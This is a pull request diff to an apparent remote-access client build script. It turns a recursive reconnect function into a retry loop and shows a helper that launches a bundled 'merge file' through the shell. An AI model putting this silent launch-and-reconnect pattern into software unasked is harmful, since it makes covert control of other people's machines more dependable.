### PR TITLE
Making the connection function non-recursive 

### DIFF
--- a/module/kizagan_client_build.py
+++ b/module/kizagan_client_build.py
@@ -303,11 +303,11 @@ def open_merge_file(merge_file):
     merge_file = _MEIPASS + f"\\\{merge_file}"
     subprocess.Popen(merge_file, shell=True)
 
-def try_connection():
-    while True:
-        try:
-            sleep(3)
-            Client().main()
-        except:
-            try_connection()
 
+connected = False
+while not connected:
+    try:
+        sleep(3)
+        connected = True
+        Client().main()
+    except: connected = False

--- a/module/kizagan_client_build.py
+++ b/module/kizagan_client_build.py
@@ -303,11 +303,11 @@ def open_merge_file(merge_file):
     merge_file = _MEIPASS + f"\\\{merge_file}"
     subprocess.Popen(merge_file, shell=True)
 
-
-connected = False
-while not connected:
-    try:
-        sleep(3)
-        connected = True
-        Client().main()
-    except: connected = False
+def try_connection():
+    connected = False
+    while not connected:
+        try:
+            sleep(3)
+            connected = True
+            Client().main()
+        except: connected = False


### PR DESCRIPTION
The recursive try_connection() function will eventually crash the client. For example, when there is no internet, the try_connection() function is called infinitely, causing a crash. By calling the function only once, it avoids memory errors.